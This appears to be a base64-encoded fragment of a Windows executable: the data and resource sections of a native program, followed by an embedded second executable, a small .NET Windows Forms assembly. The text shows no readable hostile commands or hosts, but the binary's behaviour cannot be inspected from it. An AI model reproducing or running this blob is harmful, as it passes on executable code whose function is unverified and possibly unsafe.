AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQICAgICAgICAgICAgICAgIDAwMDAwMDAwAAAAAAAAAAI1VAAAAAAAACAAAAUOdAAAgAAAAk50AACQAAAPjmQAAKAAAAYOZAABAAAAA05kAAEQAAAATmQAASAAAA4OVAABMAAAC05UAAGAAAAHzlQAAZAAAAVOVAABoAAAAc5UAAGwAAAOTkQAAcAAAAvORAAB4AAACc5EAAHwAAADj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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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